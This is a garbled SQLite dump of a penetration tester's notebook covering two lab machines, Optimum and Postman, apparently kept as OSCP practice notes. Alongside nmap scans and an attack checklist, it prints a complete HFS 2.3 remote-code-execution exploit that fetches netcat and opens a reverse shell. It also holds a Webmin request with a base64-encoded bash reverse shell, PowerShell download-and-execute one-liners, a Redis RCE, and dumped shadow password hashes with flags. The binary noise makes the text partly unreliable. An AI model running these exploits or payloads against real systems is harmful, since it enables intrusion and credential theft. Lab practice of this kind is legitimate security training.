SQLite format 3@ (-  Y/Cindexsqlite_autoindex_children_1children tableimageimageCREATE TABLE image ( node_id INTEGER, offset INTEGER, justification TEXT, anchor TEXT, png BLOB, filename TEXT, link TEXT, time INTEGER ) wtablegridgridCREATE TABLE grid ( node_id INTEGER, offset INTEGER, justification TEXT, txt TEXT, col_min INTEGER, col_max INTEGER )btablecodeboxcodeboxCREATE TABLE codebox ( node_id INTEGER, offset INTEGER, justification TEXT, txt TEXT, syntax TEXT, width INTEGER, height INTEGER, is_width_pix INTEGER, do_highl_bra INTEGER, do_show_linenum INTEGER )mtablenodenodeCREATE TABLE node ( node_id INTEGER UNIQUE, name TEXT, txt TEXT, syntax TEXT, tags TEXT, is_ro INTEGER, is_richtxt INTEGER, has_codebox INTEGER, has_table INTEGER, has_image INTEGER, level INTEGER, ts_creation INTEGER, ts_lastsave INTEGER )';indexsqlite_autoindex_node_1node Dk'  UDPcustom-colors$A?&ЍA[?Lk'  TCPcustom-colors$A?&A[>CX#9'  Enumerationnmap -sC -sV -oA ./optimum -Pn 10.10.10.8 Starting Nmap 7.80 ( https://nmap.org ) at 2020-07-06 14:34 EDT Nmap scan report for 10.10.10.8 Host is up (0.072s latency). Not shown: 999 f u5' 10.10.10.8 - Optimum@?   <B<eYS_}kwqMG!            " !    vne\SJA8/&                "!     BBeYS_}kwqMG            " !  Y/Cindexsqlite_autoindex_children_1children tableimageimageCREATE TABLE/Cindexsqlite_autoindex_children_1children tableimageimageCREATE TABLE image ( node_id INTEGER, offset INTEGER, justification TEXT, anchor TEXT, png BLOB, filename TEXT, link TEXT, time INTEGER ) wtablegridgridCREATE TABLE grid ( node_id INTEGER, offset INTEGER, justification TEXT, txt TEXT, col_min INTEGER, col_max INTEGER )btablecodeboxcodeboxCREATE TABLE codebox ( node_id INTEGER, offset INTEGER, justification TEXT, txt TEXT, syntax TEXT, width INTEGER, height INTEGER, is_width_pix INTEGER, do_highl_bra INTEGER, do_show_linenum INTEGER )mtablenodenodeCREATE TABLE node ( node_id INTEGER UNIQUE, name TEXT, txt TEXT, syntax TEXT, tags TEXT, is_ro INTEGER, is_richtxt INTEGER, has_codebox INTEGER, has_table INTEGER, has_image INTEGER, level INTEGER, ts_creation INTEGER, ts_lastsave INTEGER )';indexsqlite_autoindex_node_1node 's\+_tablebookmarkbookmark CREATE TABLE bookmark ( node_id INTEGER UNIQUE, sequence INTEGER )/ Cindexsqlite_autoindex_bookmark_1bookmark /Cindexsqlite_autoindex_children_1childrenr7tablechildrenchildrenCREATE TABLE children ( node_id INTEGER UNIQUE, father_id INTEGER, sequence INTEGER ) tableimageimageCREATE TABLE image ( node_id INTEGER, offset INTEGER, justification TEXT, anchor TEXT, png BLOB, filename TEXT, link TEXT, time INTEGER ) wtablegridgridCREATE TABLE grid ( node_id INTEGER, offset INTEGER, justification TEXT, txt TEXT, col_min INTEGER, col_max INTEGER )  iltered ports PORT STATE SERVICE VERSION 80/tcp open http HttpFileServer httpd 2.3 |_http-server-header: HFS 2.3 |_http-title: HFS / Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 16.57 seconds custom-colors*A>E w k'  UDPcustom-colors$A?&ЍA[?Lk'  TCPcustom-colors$A?&A[>CXF#9'  Enumerationnmap -sC -sV -oA ./optimum -Pn 10.10.10.8 Starting Nmap 7.80 ( https://nmap.org ) at 2020-07-06 14:34 EDT Nmap scan report for 10.10.10.8 8#'  Enumerationnmap -sC -sV -Pn -p- -oA ./Postman 10.10.10.160 Starting Nmap 7.80 ( https://nmap.org ) at 2020-07-13 14:05 EDT Nmap scan report for 10.10.10.160 Host is up (0.025s latency). 9 dW} 0Wk '  SNMPcustom-colorsA[DԢA[G!Bj '  SMBcustom-colorsA[PA[DNn )'  Other Servicescustom-colorsXA[Adk '  "CMScustom-colors$A[Y)A[Y}xn'  !WebDavcustom-colors$A[W;A[X2v)'  Dirb\DirBustercustom-colors$A?&xA[V1 m'  Niktocustom-colors$A?&oA?&.%['  Web Servicescustom-colors"A(V Qyy'J='   OtherREDIS RCE Unauthenticated CONFIRMED - CVE-2018-12326 redis-cli -h 10.10.10.160 10.10.10.160:6379> CONFIG GET * 1) "dbfilename" 2) "dump.rdb" 3) "requirepass" 4) "" 5) "masHq/'  Post Exploitationcustom-colors*AIZnn%'  ExploitationService Exploited: Rejetto HTTP File Server (HFS) 2.3.x Vulnerability Type: RCE Exploit POC: %K'  ExploitationService Exploited: RCi '  DBcustom-colorsA[EA[Sel Description: Discovery of Vulnerability Exploit Code Used #!/usr/bin/python # Exploit Title: HttpFileServer 2.3.x Remote Command Execution # Google Dork: intext:"httpfileserver 2.3" # Date: 04-01-2016 # Remote: Yes # Exploit Author: Avinash Kumar Thapa aka "-Acid" # Vendor Homepage: http://rejetto.com/ # Software Link: http://sourceforge.net/projects/hfs/ # Version: 2.3.x # Tested on: Windows Server 2008 , Windows 8, Windows 7 # CVE : CVE-2014-6287 # Description: You can use HFS (HTTP File Server) to send and receive files. # It's different from classic file sharing because it uses web technology to be more compatible with today's Internet. # It also differs from classic web servers because it's very easy to use and runs "right out-of-the box". Access your remote files, over the network. It has been successfully tested with Wine under Linux. #Usage : python Exploit.py <Target IP address> <Target Port Number> #EDB Note: You need to be using a web server hosting netcat (http://<attackers_ip>:80/nc.exe). # You may need to run it multiple times for success! import urllib2 import sys try: def script_create(): urllib2.urlopen("http://"+sys.argv[1]+":"+sys.argv[2]+"/?search=%00{.+"+save+".}") def execute_script(): urllib2.urlopen("http://"+sys.argv[1]+":"+sys.argv[2]+"/?search=%00{.+"+exe+".}") def nc_run(): urllib2.urlopen("http://"+sys.argv[1]+":"+sys.argv[2]+"/?search=%00{.+"+exe1+".}") ip_addr = "192.168.44.128" #local IP address local_port = "443" # Local Port number vbs = "C:\Users\Public\script.vbs|dim%20xHttp%3A%20Set%20xHttp%20%3D%20createobject(%22Microsoft.XMLHTTP%22)%0D%0Adim%20bStrm%3A%20Set%20bStrm%20%3D%20createobject(%22Adodb.Stream%22)%0D%0AxHttp.Open%20%22GET%22%2C%20%22http%3A%2F%2F"+ip_addr+"%2Fnc.exe%22%2C%20False%0D%0AxHttp.Send%0D%0A%0D%0Awith%20bStrm%0D%0A%20%20%20%20.type%20%3D%201%20%27%2F%2Fbinary%0D%0A%20%20%20%20.open%0D%0A%20%20%20%20.write%20xHttp.responseBody%0D%0A%20%20%20%20.savetofile%20%22C%3A%5CUsers%5CPublic%5Cnc.exe%22%2C%202%20%27%2F%2Foverwrite%0D%0Aend%20with" save= "save|" + vbs vbs2 = "cscript.exe%20C%3A%5CUsers%5CPublic%5Cscript.vbs" exe= "exec|"+vbs2 vbs3 = "C%3A%5CUsers%5CPublic%5Cnc.exe%20-e%20cmd.exe%20"+ip_addr+"%20"+local_port exe1= "exec|"+vbs3 script_create() execute_script() nc_run() except: print """[.]Something went wrong..! Usage is :[.] python exploit.py <Target IP address> <Target Port Number> Don't forgot to change the Local IP address and Port number on the script""" Proof\Local.txt File ☐ Screenshot with ifconfig\ipconfig ☐ Submit too OSCP Exam Panel custom-colors,A6>{' =< !"#$%&'()*+,-./012345678=>e Registered Owner: Windows User Registered Organization: Product ID: 00252-70000-00000-AA535 Original Install Date: 18/3/2017, 1:51:36 �� System Boot Time: 13/7/2020, 4:03:10 �� System Manufacturer: VMware, Inc. System Model: VMware Virtual Platform System Type: x64-based PC Processor(s): 1 Processor(s) Installed.  bin:*:18132:0:99999:7::: sys:*:18132:0:99999:7::: sync:*:18132:0:99999:7::: games:*:18132:0:99999:7::: man:*:18132:0:99999:7:::  lp:*:18132:0:99999:7::: mail:*:18132:0:99999:7::: news:*:18132:0:99999:7::: uucp:*:18132:0:99999:7::: proxy:*:18132:0:99999:7::: www-data:*:18132:0:99999:7::: backup:*:18132:0:99999:7::: list:*:18132:0:99999:7::: irc:*:18132:0:99999:7::: gnats:*:18132:0:99999:7::: nobody:*:18132:0:99999:7::: systemd-network:*:18132:0:99999:7::: systemd-resolve:*:18132:0:99999:7::: syslog:*:18132:0:99999:7::: messagebus:*:18132:0:99999:7::: _apt:*:18132:0:99999:7::: uuidd:*:18132:0:99999:7::: sshd:*:18132:0:99999:7::: Matt:$6$QNBwoLyZ$s6GTOYGr7.6USu4BlCcjFsWhvgQ5BVOqV830iiB4TTc3i4jbuaCxuuF9AO7uuP65PRNMnREZ7NLSMr7XOSGe80:18133:0:99999:7::: redis:*:18133:0:99999:7::: custom-colors$ApeVexe IEX(New-Object Net.WebClient).DownloadString('http://10.10.14.10/Sherlock.ps1') Powershell.exe IEX(New-Object Net.WebClient).DownloadString('http://10.10.14.10/Sherlock.ps1') Title : User Mode to Ring (KiTrap0D) MSBulletin : MS10-015 CVEID : 2010-0232 Link : https://www.exploit-db.com/exploits/11199/ VulnStatus : Not supported on 64-bit systems Title : Task Scheduler .XML MSBulletin : MS10-092 CVEID : 2010-3338, 2010-3888 Link : https://www.exploit-db.com/exploits/19930/ VulnStatus : Not Vulnerable Title : NTUserMessageCall Win32k Kernel Pool Overflow MSBulletin : MS13-053 CVEID  : 2013-1300 Link : https://www.exploit-db.com/exploits/33213/ VulnStatus : Not supported on 64-bit systems Title : TrackPopupMenuEx Win32k NULL Page MSBulletin : MS13-081 CVEID : 2013-3881 Link : https://www.exploit-db.com/exploits/31576/ VulnStatus : Not supported on 64-bit systems Title : TrackPopupMenu Win32k Null Pointer Dereference MSBulletin : MS14-058 CVEID : 2014-4113 Link : https://www.exploit-db.com/exploits/35101/ VulnStatus : Not Vulnerable Title : ClientCopyImage Win32k MSBulletin : MS15-051 CVEID : 2015-1701, 2015-2433 Link : https://www.exploit-db.com/exploits/37367/ VulnStatus : Not Vulnerable Title : Font Driver Buffer Overflow MSBulletin : MS15-078 CVEID : 2015-2426, 2015-2433 Link : https://www.exploit-db.com/exploits/38222/ VulnStatus : Not Vulnerable Title : 'mrxdav.sys' WebDAV MSBulletin : MS16-016 CVEID : 2016-0051 Link : https://www.exploit-db.com/exploits/40085/ VulnStatus : Not supported on 64-bit systems Title : Secondary Logon Handle MSBulletin : MS16-032 CVEID : 2016-0099 Link : https://www.exploit-db.com/exploits/39719/ VulnStatus : Appears Vulnerable Title : Windows Kernel-Mode Drivers EoP MSBulletin : MS16-034 CVEID : 2016-0093/94/95/96 Link : https://github.com/SecWiki/windows-kernel-exploits/tree/master/MS1 6-034? VulnStatus : Appears Vulnerable Title : Win32k Elevation of Privilege MSBulletin : MS16-135 CVEID : 2016-7255 Link : https://github.com/FuzzySecurity/PSKernel-Primitives/tree/master/S ample-Exploits/MS16-135 VulnStatus : Appears Vulnerable Title : Nessus Agent 6.6.2 - 6.10.3 MSBulletin : N/A CVEID : 2017-7199 Link : https://aspe1337.blogspot.co.uk/2017/04/writeup-of-cve-2017-7199.h tml VulnStatus : Not Vulnerable kali@kali:/Windows-Exploit-Suggester$ python windows-exploit-suggester.py --database 2020-07-06-mssb.xls --systeminfo /home/kali/Desktop/optimum/sysinfo.txt [*] initiating winsploit version 3.3... [*] database file detected as xls or xlsx based on extension [*] attempting to read from the systeminfo input file  [+] systeminfo input file read successfully (utf-8) [*] querying database file for potential vulnerabilities [*] comparing the 32 hotfix(es) against the 266 potential bulletins(s) with a database of 137 known exploits [*] there are now 246 remaining vulns ! [+] [E] exploitdb PoC, [M] Metasploit module, [*] missing bulletin [+] windows version identified as 'Windows 2012 R2 64-bit' [*] " [E] MS16-135: Security Update for Windows Kernel-Mode Drivers (3199135) - Important [*] https://www.exploit-db.com/exploits/40745/ -- Microsoft Windows Kernel - win32k Denial of Service (MS16-135) # [*] https://www.exploit-db.com/exploits/41015/ -- Microsoft Windows Kernel - 'win32k.sys' 'NtSetWindowLongPtr' Privilege Escalation (MS16-135) (2) [*] https://github.com/tinysec/public/tree/master/CVE-2016-7255 $ [*] [E] MS16-098: Security Update for Windows Kernel-Mode Drivers (3178466) - Important % [*] https://www.exploit-db.com/exploits/41020/ -- Microsoft Windows 8.1 (x64) - RGNOBJ Integer Overflow (MS16-098) [*] & [M] MS16-075: Security Update for Windows SMB Server (3164038) - Important [*] https://github.com/foxglovesec/RottenPotato ' [*] https://github.com/Kevin-Robertson/Tater [*] https://bugs.chromium.org/p/project-zero/issues/detail?id=222 -- Windows: Local WebDAV NTLM Reflection Elevation of Privilege ( [*] https://foxglovesecurity.com/2016/01/16/hot-potato/ -- Hot Potato - Windows Privilege Escalation [*] ) [E] MS16-074: Security Update for Microsoft Graphics Component (3164036) - Important [*] https://www.exploit-db.com/exploits/39990/ -- Windows - gdi32.dll Multiple DIB-Related EMF Record Handlers Heap-Based Out-of-Bounds Reads/Memory Disclosure (MS16-074), PoC [*] https://www.exploit-db.com/exploits/39991/ -- Windows Kernel - ATMFD.DLL NamedEscape 0x250C Pool Corruption (MS16-074), PoC [*] [E] MS16-063: Cumulative Security Update for Internet Explorer (3163649) - Critical + [*] https://www.exploit-db.com/exploits/39994/ -- Internet Explorer 11 - Garbage Collector Attribute Type Confusion (MS16-063), PoC [*] , [E] MS16-032: Security Update for Secondary Logon to Address Elevation of Privile (3143141) - Important [*] https://www.exploit-db.com/exploits/40107/ -- MS16-032 Secondary Logon Handle Privilege Escalation, MSF - [*] https://www.exploit-db.com/exploits/39574/ -- Microsoft Windows 8.1/10 - Secondary Logon Standard Handles Missing Sanitization Privilege Escalation (MS16-032), PoC [*] https://www.exploit-db.com/exploits/39719/ -- Microsoft Windows 7-10 & Server 2008-2012 (x32/x64) - Local Privilege Escalation (MS16-032) (PowerShell), PoC . [*] https://www.exploit-db.com/exploits/39809/ -- Microsoft Windows 7-10 & Server 2008-2012 (x32/x64) - Local Privilege Escalation (MS16-032) (C#) [*] / [M] MS16-016: Security Update for WebDAV to Address Elevation of Privilege (3136041) - Important [*] https://www.exploit-db.com/exploits/40085/ -- MS16-016 mrxdav.sys WebDav Local Privilege Escalation, MSF 0 [*] https://www.exploit-db.com/exploits/39788/ -- Microsoft Windows 7 - WebDAV Privilege Escalation Exploit (MS16-016) (2), PoC [*] https://www.exploit-db.com/exploits/39432/ -- Microsoft Windows 7 SP1 x86 - WebDAV Privilege Escalation (MS16-016) (1), PoC 1 [*] [E] MS16-014: Security Update for Microsoft Windows to Address Remote Code Execution (3134228) - Important 2 [*] Windows 7 SP1 x86 - Privilege Escalation (MS16-014), https://www.exploit-db.com/exploits/40039/, PoC [*] [E] MS16-007: Security Update f3or Microsoft Windows to Address Remote Code Execution (3124901) - Important [*] https://www.exploit-db.com/exploits/39232/ -- Microsoft Windows devenum.dll!DeviceMoniker::Load() - Heap Corruption Buffer Underflow (MS16-007), PoC [*] https:4//www.exploit-db.com/exploits/39233/ -- Microsoft Office / COM Object DLL Planting with WMALFXGFXDSP.dll (MS-16-007), PoC [*] [E] MS15-132: Security Update for Microsoft Windows to Address Remote Code Execution (3116162) - Important 5 [*] https://www.exploit-db.com/exploits/38968/ -- Microsoft Office / COM Object DLL Planting with comsvcs.dll Delay Load of mqrt.dll (MS15-132), PoC [*] https://www.exploit-db.com/exploits/38918/ -- Microsoft Office / COM Object els.dll DLL Planting (MS165-134), PoC [*] [E] MS15-112: Cumulative Security Update for Internet Explorer (3104517) - Critical 7 [*] https://www.exploit-db.com/exploits/39698/ -- Internet Explorer 9/10/11 - CDOMStringDataList::InitFromString Out-of-Bounds Read (MS15-112) [*] 8 [E] MS15-111: Security Update for Windows Kernel to Address Elevation of Privilege (3096447) - Important [*] https://www.exploit-db.com/exploits/38474/ -- Windows 10 Sandboxed Mount Reparse Point Creation Mitigation Bypass (MS15-111), PoC 9 [*] [E] MS15-102: Vulnerabilities in Windows Task Management Could Allow Elevation of Privilege (3089657) - Important [*] https://www.exploit-db.com/exploits/38202/ -- Windows CreateObjectTask SettingsSyncDiagnostics Privilege Escalation, PoC [*] https://www.exploit-db.com/exploits/38200/ -- Windows Task Scheduler DeleteExpiredTaskAfter FileNot shown: 65531 closed ports PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0) | ssh-hostkey: | 2048 46:83:4f:f1:38:61:c0:1c:74:cb:b5:d1:4a:68:4d:77 (RSA) | 256 2d:8d:27:d2:df:15:1a:31:53:05:fb:ff:f0:62:26:89 (ECDSA) |_ 256 ca:7c:82:aa:5a:d3:72:ca:8b:8a:38:3a:80:41:a0:45 (ED25519) 80/tcp open http Apache httpd 2.4.29 ((Ubuntu)) |_http-server-header: Apache/2.4.29 (Ubuntu) |_http-title: The Cyber Geek's Personal Website 6379/tcp open redis Redis key-value store 4.0.9 10000/tcp open http MiniServ 1.910 (Webmin httpd) |_http-title: Site doesn't have a title (text/html; Charset=iso-8859-1). Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 58.42 seconds custom-colors*A(9000/package-updates/update.cgi?xnavigation=1">https://10.10.10.160:10000/package-updates/update.cgi?xnavigation=1 Content-Type: application/x-www-form-urlencoded; charset=UTF-8 X-Progressive-URL: https://10.10.10.160:10000/package-updates/update.cgi X-Requested-From: package-updates X-Requested-From-Tab: webmin X-Requested-With: XMLHttpRequest Content-Length: 119 Connection: close Cookie: redirect=1; testing=1; sid=0651c32f88fa2dec858911a2afec1d7a u=acl%2Fapt&u=$(echo${IFS}YmFzaCAtYyAiYmFzaCAtaSA%2bJiAvZGV2L3RjcC8xMC4xMC4xNC4xMC85OTk5IDA%2bJjEi|base64${IFS}-d|bash) Proof\Local.txt File ☐ Screenshot with ifconfig\ipconfig ☐ Submit too OSCP Exam Panel custom-colorsAp8rWindows ClientCopyImage Win32k Exploit, MSF [*] [E] MS15-010: Vulnerabilities in Wi: Vulnerability Type: Exploit POC: Description: Discovery of Vulnerability Lateral to Matt using /opt/id_rsa.bak's credentials Privesc to Root - https://github.com/Dog9w23/Webmin-1.910-Exploit/blob/master/Webmin%201.910%20-%20Remote%20Code%20Execution%20using%20BurpSuite Exploit Code Used POST /package-updates/update.cgi HTTP/1.1 Host: 10.10.10.160:10000 User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0 Accept: */* Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Referer: http://www.exploit-db.com/exploits/35474/ -- Windows Kerberos - Elevation of Privilege (MS14-068), PoC [*] [M] MS14-064: Vulnerabilities in Windows OLE Could Allow Remote Code Execution (3011443) - Critical [*] https://www.exploit-db.com/exploits/37800// -- Microsoft Windows HTA (HTML Application) - Remote Code Execution (MS14-064), PoC [*] http://www.exploit-db.com/exploits/35308/ -- Internet Explorer OLE Pre-IE11 - Automation Array Remote Code Execution / Powershell VirtualAlloc (MS14-064), PoC [*] rich_text>http://www.exploit-db.com/exploits/35229/ -- Internet Explorer <= 11 - OLE Automation Array Remote Code Execution (#1), PoC [*] http://www.exploit-db.com/exploits/35230/ -- Internet Explorer < 11 - OLE Automation Array Remote Code Execution (MSF), MSF [*] http://www.exploit-db.com/exploits/35235/ -- MS14-064 Microsoft Windows OLE Package Manager Code Execution Through Python, MSF [*] http://www.exploit-db.com/exploits/35236/ -- MS14-064 Microsoft Windows OLE Package Manager Code Execution, MSF [*] [M] MS14-060: Vulnerability in Windows OLE Could Allow Remote Code Execution (3000869) - Important [*] < OO\O G'   NetworkIPConfig\IFConfig Network Processes ARP DNS Routecustom-colors$A[*܁p)'   Users & GroupsUsers Groupscustom-colors$A[k׀.9q'   Installed ApplicationsInstalled Applicationscustom-colors$AILg 1)u'  Script ResultsC:\Users\kostas\Desktop>systeminfo systeminfo Hi)e'  Script Results ######################################################### # Local Linux Enumeration & Privilege Escalation Script # ######################################M X#X/]'  Running ProcessesProcess Listcustom-colors$AIwq&#w'  File SystemWriteable Files\Directories Directory List custom-colors$A[3QZ-U'  Host InformationOperating System Architecture Domain Installed Updates custom-colors$A[4* N^QN~o'   Hashesroot:$6$BY.59Uqc$OCL4yigbZkNkprjAJHjUEzPIjvbYUuyNDwBwcl9/R3doZU3myn/cnTakyFmQRUrbiqwdxTfYs/MmYmLOCmROS1:18134:0:99999:7::: daemon:*:18132:0:99999:7::: i'  Passwordscustom-colors$A?'!h'   Hashescustom-colors$A?&&g'  Goodiescustom-colorsVA?& c6+U'   Priv EscalationService Exploited:;)c'  Scheduled JobsScheduled Taskscustom-colors$ANl w!9' 10.10.1G/-'  Proof\Flags\OtherUser - Matt - 517ad0ec2458ca97af8d93aac08a2f3c Root - a257741c5bed8be7778c6ed95686ddcecustom-colors$Ap(#i' MethodologyNetwork Scanning ☐ nmap -sn 10.11.1.* ☐ nmap -sL 10.11.1.* ☐ nbtscan -r 10.11.1.0/24 ☐ smbtree Software Versions Potential Exploitscustom-colorsANlH{xEDIS RCE Unauthenticated Vulnerability Type: Exploit POC: CVE-2018-12326 Description: Discovery of Vulnerability redis-cli -h 10.10.10.160 10.10.10.160:6379> CONFIG GET * Exploit Code Used https://github.com/Avinash-acid/Redis-Server-Exploit/blob/master/redis.py Proof\Local.txt File ☐ Screenshot with ifconfig\ipconfig ☐ Submit too OSCP Exam Panel custom-colors,A,Zonfig ☐ Submit too OSCP Exam Panel custom-colorsA xt>http://www.exploit-db.com/exploits/35055/ -- Windows OLE - Remote Code Execution 'Sandworm' Exploit (MS14-060), PoC [*] http://www.exploit-db.com/exploits/35020/ -- MS14-060 Microsoft Windows OLE Package Manager Code Execution, MSF [*] [M] MS14-058: Vulnerabilities in Kernel-Mode Driver Could Allow Remote Code Execution (3000061) - Critical [*] http://www.exploit-db.com/exploits/35101/ -- Windows TrackPopupMenu Win32k NULL Pointer Dereference, MSF [*] [E] MS13-101: Vulnerabilities inw!9' 10.10.10.160 - Postmancustom-colorsA'^Rh  ' Log Bookcustom-colors(AI^Fich_text>Individual Host Scanning ☐ nmap --top-ports 20 --open -iL iplist.txt ☐ nmap -sS -A -sV -O -p- ipaddress ☐ nmap -sU ipaddress Service Scanning WebAppNiktodirb ☐ dirbuster ☐ wpscan ☐ dotdotpwn ☐ view source ☐ davtest\cadevar ☐ droopscan ☐ joomscan ☐ LFI\RFI Test Linux\Windows ☐ snmpwalk -c public -v1 ipaddress 1 ☐ smbclient -L //ipaGddress ☐ showmount -e ipaddress port ☐ rpcinfo ☐ Enum4Linux Anything Elsenmap scripts (locate *nse* | grep servicename) ☐ hydra ☐ MSF Aux Modules ☐ Download the softward Exploitation ☐ Gather Version Numbes ☐ Searchsploit ☐ Default Creds ☐ Creds Previously Gathered ☐ Download the software Post Exploitation Linux ☐ linux-local-enum.sh ☐ linuxprivchecker.py ☐ linux-exploit-suggestor.sh ☐ unix-privesc-check.py Windows ☐ wpc.exe ☐ windows-exploit-suggestor.py ☐ windows_privesc_check.py ☐ windows-privesc-check2.exe Priv Escalationacesss internal services (portfwd) ☐ add account Windows ☐ List of exploits Linux ☐ sudo su ☐ KernelDB ☐ Searchsploit Final ☐ Screenshot of IPConfig\WhoamI ☐ Copy proof.txt ☐ Dump hashes ☐ Dump SSH Keys ☐ Delete filescustom-colorsANl<A[ڸ.,Iterauth" 6) "" 7) "cluster-announce-ip" 8) "" 9) "unixsocket" 10) "" 11) "logfile" 12) "/var/log/redis/redis-server.log" 13) "pidfile" 14) "/var/run/redis/redis-server.pid" 15) "slave-announce-ip" 16) "" 17) "maxmemory" 18) "0" 19) "proto-max-bulk-len" 20) "536870912" 21) "client-query-buffer-limit" 22) "1073741824" 23) "maxmemory-samples" 24) "5" 25) "lfu-log-factor" 26) "10" 27) "lfu-decay-time" 28) "1" 29) "timeout" 30) "0" 31) "active-defrag-threshold-lower" 32) "10" 33) "active-defrag-threshold-upper" 34) "100" 35) "active-defrag-ignore-bytes" 36) "104857600" 37) "active-defrag-cycle-min" 38) "25" 39) "active-defrag-cycle-max&quoJt; 40) "75" 41) "auto-aof-rewrite-percentage" 42) "100" 43) "auto-aof-rewrite-min-size" 44) "67108864" 45) "hash-max-ziplist-entries" 46) "512" 47) "hash-max-ziplist-value" 48) "64" 49) "list-max-ziplist-size" 50) "-2" 51) "list-compress-depth" 52) "0" 53) "set-max-intset-entries" 54) "512" 55) "zset-max-ziplist-entries" 56) "128" 57) "zset-max-ziplist-value" 58) "64" 59) "hll-sparse-max-bytes" 60) "3000" 61) "lua-time-limit" 62) "5000" 63) "slowlog-log-slower-than" 64) "10000" 65) "latency-monitor-threshold" 66) "0" 67) "slowlog-max-len" 68) "128" 69) "port" 70) "6379" 71) "cluster-announce-port" 72) "0" 73) "cluster-announce-bus-port" K74) "0" 75) "tcp-backlog" 76) "511" 77) "databases" 78) "16" 79) "repl-ping-slave-period" 80) "10" 81) "repl-timeout" 82) "60" 83) "repl-backlog-size" 84) "1048576" 85) "repl-backlog-ttl" 86) "3600" 87) "maxclients" 88) "10000" 89) "watchdog-period" 90) "0" 91) "slave-priority" 92) "100" 93) "slave-announce-port" 94) "0" 95) "min-slaves-to-write" 96) "0" 97) "min-slaves-max-lag" 98) "10" 99) "hz" 100) "10" 101) "cluster-node-timeout" 102) "15000" 103) "cluster-migration-barrier" 104) "1" 105) "cluster-slave-validity-factor" 106) "10" 107) "repl-diskless-sync-delay" 108) "5" 109) "tcp-keepalive" 110) "300" 111) "cLluster-require-full-coverage" 112) "yes" 113) "cluster-slave-no-failover" 114) "no" 115) "no-appendfsync-on-rewrite" 116) "no" 117) "slave-serve-stale-data" 118) "yes" 119) "slave-read-only" 120) "yes" 121) "stop-writes-on-bgsave-error" 122) "yes" 123) "daemonize" 124) "yes" 125) "rdbcompression" 126) "yes" 127) "rdbchecksum" 128) "yes" 129) "activerehashing" 130) "yes" 131) "activedefrag" 132) "no" 133) "protected-mode" 134) "no" 135) "repl-disable-tcp-nodelay" 136) "no" 137) "repl-diskless-sync" 138) "no" 139) "aof-rewrite-incremental-fsync" 140) "yes" 141) "aof-load-truncated" 142) "yes" 143) "aof-use-rdb-preamble" 144) "no" 145) "lazyfree-lazy-eviction" 146) &quot;no" 147) "lazyfree-lazy-expire" 148) "no" 149) "lazyfree-lazy-server-del" 150) "no" 151) "slave-lazy-flush" 152) "no" 153) "maxmemory-policy" 154) "noeviction" 155) "loglevel" 156) "notice" 157) "supervised" 158) "no" 159) "appendfsync" 160) "everysec" 161) "syslog-facility" 162) "local0" 163) "appendonly" 164) "no" 165) "dir" 166) "/var/lib/redis" 167) "save" 168) "900 1 300 10 60 10000" 169) "client-output-buffer-limit" 170) "normal 0 0 0 slave 268435456 67108864 60 pubsub 33554432 8388608 60" 171) "unixsocketperm" 172) "0" 173) "slaveof" 174) "" 175) "notify-keyspace-events" 176) "" 177) "bind" 178) "0.0.0.0 ::1" 10.10.10.160:6379>custom-colorsA[EϯA) N################### # www.rebootuser.com # version 0.982 [-] Debug Info [+] Thorough tests = Enabled Scan started at: Mon Jul 13 19:59:14 BST 2020  ### SYSTEM ############################################## [-] Kernel information: Linux Postman 4.15.0-58-generic #64-Ubuntu SMP Tue Aug 6 11:12:41 UTC 2019 x86_64 x86_64 x86_64 GNU/Linux [-] Kernel information (continued): Linux version 4.15.0-58-generic (buildd@lcy01-amd64-013) (gcc version 7.4.0 (Ubuntu 7.4.0-1ubuntu1~18.04.1)) #64-Ubuntu SMP Tue Aug 6 11:12:41 UTC 2019 [-] Specific release information: DISTRIB_ID=Ubuntu DISTRIB_RELEASE=18.04 DISTRIB_CODENAME=bionic DISTRIB_DESCRIPTION="Ubuntu 18.04.3 LTS" NAME="Ubuntu" VERSION="18.04.3 LTS (Bionic Beaver)" ID=ubuntu ID_LIKE=debian PRETTY_NAME="Ubuntu 18.04.3 LTS" VERSION_ID=&quOot;18.04" HOME_URL="https://www.ubuntu.com/" SUPPORT_URL="https://help.ubuntu.com/" BUG_REPORT_URL="https://bugs.launchpad.net/ubuntu/" PRIVACY_POLICY_URL="https://www.ubuntu.com/legal/terms-and-policies/privacy-policy" VERSION_CODENAME=bionic UBUNTU_CODENAME=bionic [-] Hostname: Postman ### USER/GROUP ########################################## [-] Current user/group info: uid=107(redis) gid=114(redis) groups=114(redis) [-] Users that have previously logged onto the system: Username Port From P Latest root pts/0 10.10.14.3 Tue Oct 29 09:26:37 +0000 2019 Matt pts/4 192.168.1.4 Mon Aug 26 00:04:37 +0100 2019 redis pts/0 10.10.14.10 Mon Jul 13 19:52:52 +0100 2020 [-] Who else is logged on: 19:59:14 up 1:04, 1 user, load average: 0.00, 0.00, 0.00 USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT redis pts/0 10.10.14.10 19:52 2.00s 0.03s 0.00s /bin/bash ./LinEnum.sh -t [-] Group memberships: uid=0(root) gid=0(root) groups=0(root) uid=1(daemon) gid=1(daemon) groups=1(daemon) uid=2(bin) gid=2(bin) groups=2(bin) uid=3(sys) gid=3(sys) groups=3(sys) uid=4(sync) gid=65534(nogroup) groups=65534(nogroup) uid=5(games) gid=60(games) groups=60(games) uid=6(man) gid=12(man) groups=12(man) uid=7(lp) gid=7(lp) groups=7(lp) uid=8(mail) gid=8(mail) groups=8(mail) uid=9(news) gid=9(news) groups=9(news) uid=10(uucp) gid=10(uucp) groups=10(uucp) uid=13(proxy) gid=13(proxy) groups=13(prQoxy) uid=33(www-data) gid=33(www-data) groups=33(www-data) uid=34(backup) gid=34(backup) groups=34(backup) uid=38(list) gid=38(list) groups=38(list) uid=39(irc) gid=39(irc) groups=39(irc) uid=41(gnats) gid=41(gnats) groups=41(gnats) uid=65534(nobody) gid=65534(nogroup) groups=65534(nogroup) uid=100(systemd-network) gid=102(systemd-network) groups=102(systemd-network) uid=101(systemd-resolve) gid=103(systemd-resolve) groups=103(systemd-resolve) uid=102(syslog) 